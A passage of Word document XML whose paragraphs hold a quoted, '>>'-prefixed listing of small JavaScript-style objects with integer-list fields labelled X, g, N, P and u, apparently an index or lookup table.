    </w:p>
    <w:p w14:paraId="25D09697" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DD421" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FD572" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C5FFC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 11,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B4420" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9169F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389A5F74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 4, 5, 6, 7, 8, 9, 10, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CA668" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 280]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38989F46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522322CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB4BFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 4, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F4596" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D5E10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34, 44, 94, 257, 323]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E6C19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95BE38" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [10, 8, 11, 9, 18, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF3A98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867A14E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 12, 47, 66, 69, 104, 135, 158, 159, 160, 191, 224, 252, 269, 311, 316, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3D6C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A732E90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE32D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481247D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961CD11" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804D01B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB067DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D4AC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A5E79" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 10, 13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D875245" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6C2D42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10111120" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAAB6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F5447" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF12659" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158F63C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 4, 5, 6, 8, 9, 10, 11, 12, 13, 14, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAFD5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 7, 15, 21, 31, 33, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E06C102" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427686F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE23CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531008CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 11, 15, 16, 19, 21, 23, 24, 25, 27, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E6316" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C08D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B6B95" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B0062" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA6D7E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540755F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38799A61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24572D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09312E52" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECAB284" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012F4AAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E505E5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40B9E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A28A707" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C7A15" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204367F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB68D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E13374" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027FC9F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B733CD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 27]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF16AC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A5C70" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D91019" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B8000" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A4F93" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B907E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF326A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F0905" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 16, 19, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A9E6BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0616BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A312FA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BAADB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 9, 21, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F766993" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD1A53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7A789" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D31441" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [13, 16, 20, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BCC127" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4AD035" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40224F54" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A2DB1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7D9E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE933D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D63405B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8E1EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 18, 19, 27]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF956A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243E152" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127CA26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E82F8F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [206]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0195B117" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B769FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569F650" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B337A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 13, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792B60C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625EC565" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C7A821" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89DE2B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CEBD8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290773D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B3AB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A48A3B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCD15D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B88D44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28103130" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BBCDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 5, 7, 9, 13, 14, 15, 23, 40, 200, 219, 249, 277, 282, 283, 330, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8DCCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB63A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA42C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0889C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 15, 16, 19, 21, 31, 33, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5AAFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D1EA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD9A60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17082713" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFC158" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733924B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242287D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 6, 7, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F18439C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 8, 196, 208, 290, 309, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6AFC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF26C16" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B297F6D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A671F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422C0BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24490082" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA550A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413A67B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [324]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E67CAD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549B0F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716F5CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E0C644" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822DDCA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA38C56" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
